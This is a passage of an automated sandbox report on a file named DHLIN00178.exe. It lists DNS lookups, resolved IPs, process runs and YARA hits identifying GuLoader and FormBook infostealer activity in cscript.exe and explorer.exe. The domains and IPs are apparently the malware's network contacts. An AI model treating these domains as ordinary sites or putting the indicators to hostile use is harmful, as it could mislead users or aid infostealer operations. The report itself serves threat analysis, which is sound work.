                                                                    Mar 17, 2023 21:39:59.629028082 CET192.168.11.201.1.1.10x9baaStandard query (0)www.37123.vipA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:14.046832085 CET192.168.11.201.1.1.10xa56cStandard query (0)www.adasoft.infoA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:26.966200113 CET192.168.11.201.1.1.10xcfeStandard query (0)www.hhkk143.cfdA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:39.635067940 CET192.168.11.201.1.1.10x4b01Standard query (0)www.popcors.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:53.178683996 CET192.168.11.201.1.1.10x4dd1Standard query (0)www.spotcheck.siteA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:06.707278013 CET192.168.11.201.1.1.10xd571Standard query (0)www.dinggubd.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:21.188827991 CET192.168.11.201.1.1.10x2a07Standard query (0)www.hot6s.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:35.545300961 CET192.168.11.201.1.1.10x49efStandard query (0)www.0w3jy.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:36.560158968 CET192.168.11.209.9.9.90x49efStandard query (0)www.0w3jy.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:50.884869099 CET192.168.11.201.1.1.10xc593Standard query (0)www.cmproutdoors.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:04.725537062 CET192.168.11.201.1.1.10x9ba6Standard query (0)www.daon3999.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:05.741060972 CET192.168.11.209.9.9.90x9ba6Standard query (0)www.daon3999.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:21.425585985 CET192.168.11.201.1.1.10xc8caStandard query (0)www.5319ss.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:35.609678030 CET192.168.11.201.1.1.10xef7bStandard query (0)www.riverflow.netA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:48.576221943 CET192.168.11.201.1.1.10xe4b8Standard query (0)www.verde-amar.infoA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Mar 17, 2023 21:37:33.046544075 CET1.1.1.1192.168.11.200x7fcbNo error (0)machupichuturismo.com162.213.255.18A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.725651026 CET1.1.1.1192.168.11.200xc897No error (0)www.sandyhillsagritourism.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.725651026 CET1.1.1.1192.168.11.200xc897No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.725651026 CET1.1.1.1192.168.11.200xc897No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:34.203830957 CET1.1.1.1192.168.11.200xb713No error (0)www.sem-jobs.com85.13.156.177A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:46.928004026 CET1.1.1.1192.168.11.200x2334No error (0)www.casinoenligne-france.info3.9.182.46A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)www.37123.vipehbw3ftr-u.funnull01.vipCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)ehbw3ftr-u.funnull01.vipu4tgw7dr.n.funnull35.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)u4tgw7dr.n.funnull35.com103.20.61.209A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)u4tgw7dr.n.funnull35.com103.20.61.210A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:00.230015993 CET1.1.1.1192.168.11.200x9baaNo error (0)u4tgw7dr.n.funnull35.com103.20.61.207A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:14.119550943 CET1.1.1.1192.168.11.200xa56cNo error (0)www.adasoft.infoadasoft.infoCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:14.119550943 CET1.1.1.1192.168.11.200xa56cNo error (0)adasoft.info81.88.48.71A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:26.986928940 CET1.1.1.1192.168.11.200xcfeNo error (0)www.hhkk143.cfd188.114.96.3A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:26.986928940 CET1.1.1.1192.168.11.200xcfeNo error (0)www.hhkk143.cfd188.114.97.3A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:39.985469103 CET1.1.1.1192.168.11.200x4b01No error (0)www.popcors.compopcors.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:39.985469103 CET1.1.1.1192.168.11.200x4b01No error (0)popcors.com173.230.227.171A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:40:53.192972898 CET1.1.1.1192.168.11.200x4dd1No error (0)www.spotcheck.site199.192.30.193A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:07.026993990 CET1.1.1.1192.168.11.200xd571No error (0)www.dinggubd.net38.163.2.19A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:21.207340002 CET1.1.1.1192.168.11.200x2a07No error (0)www.hot6s.com104.21.8.203A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:21.207340002 CET1.1.1.1192.168.11.200x2a07No error (0)www.hot6s.com172.67.157.215A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.020494938 CET1.1.1.1192.168.11.200x49efNo error (0)www.0w3jy.comhk.ygrcw.cnCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.020494938 CET1.1.1.1192.168.11.200x49efNo error (0)hk.ygrcw.cn164.88.122.250A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.353796959 CET9.9.9.9192.168.11.200x49efNo error (0)www.0w3jy.comhk.ygrcw.cnCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:37.353796959 CET9.9.9.9192.168.11.200x49efNo error (0)hk.ygrcw.cn164.88.122.250A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:41:51.192102909 CET1.1.1.1192.168.11.200xc593No error (0)www.cmproutdoors.com156.255.170.114A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.574141026 CET1.1.1.1192.168.11.200x9ba6No error (0)www.daon3999.netdaon3999.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.574141026 CET1.1.1.1192.168.11.200x9ba6No error (0)daon3999.net222.122.213.231A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.817251921 CET9.9.9.9192.168.11.200x9ba6No error (0)www.daon3999.netdaon3999.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:06.817251921 CET9.9.9.9192.168.11.200x9ba6No error (0)daon3999.net222.122.213.231A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:21.853430033 CET1.1.1.1192.168.11.200xc8caNo error (0)www.5319ss.comgy.adsfzcvx.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:21.853430033 CET1.1.1.1192.168.11.200xc8caNo error (0)gy.adsfzcvx.com154.210.212.94A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:35.920783997 CET1.1.1.1192.168.11.200xef7bNo error (0)www.riverflow.net64.190.63.111A (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:42:48.607541084 CET1.1.1.1192.168.11.200xe4b8No error (0)www.verde-amar.info185.53.177.54A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • machupichuturismo.com
                                                                    • www.sandyhillsagritourism.com
                                                                    • www.sem-jobs.com
                                                                    • www.casinoenligne-france.info
                                                                    • www.37123.vip
                                                                    • www.adasoft.info
                                                                    • www.hhkk143.cfd
                                                                    • www.popcors.com
                                                                    • www.spotcheck.site
                                                                    • www.dinggubd.net
                                                                    • www.hot6s.com
                                                                    • www.0w3jy.com
                                                                    • www.cmproutdoors.com
                                                                    • www.daon3999.net
                                                                    • www.5319ss.com
                                                                    • www.riverflow.net
                                                                    • www.verde-amar.info

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:1
                                                                    Start time:21:35:02
                                                                    Start date:17/03/2023
                                                                    Path:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    Imagebase:0x400000
                                                                    File size:888192 bytes
                                                                    MD5 hash:66FDF2DF4FC8601124DF76C284F797E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.6092061877.000000000A021000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:5
                                                                    Start time:21:37:16
                                                                    Start date:17/03/2023
                                                                    Path:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    Imagebase:0x400000
                                                                    File size:888192 bytes
                                                                    MD5 hash:66FDF2DF4FC8601124DF76C284F797E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:7
                                                                    Start time:21:38:58
                                                                    Start date:17/03/2023
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff71ac00000
                                                                    File size:4849904 bytes
                                                                    MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:8
                                                                    Start time:21:39:03
                                                                    Start date:17/03/2023
                                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                    Imagebase:0x6a0000
                                                                    File size:144896 bytes
                                                                    MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:9
                                                                    Start time:21:39:24
                                                                    Start date:17/03/2023
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                    Imagebase:0x7ff739710000
                                                                    File size:597432 bytes
                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Target ID:12
                                                                    Start time:21:39:29
                                                                    Start date:17/03/2023
                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5256 -s 284
                                                                    Imagebase:0x7ff6e2850000
                                                                    File size:568632 bytes
                                                                    MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Disassembly

                                                                    No disassembly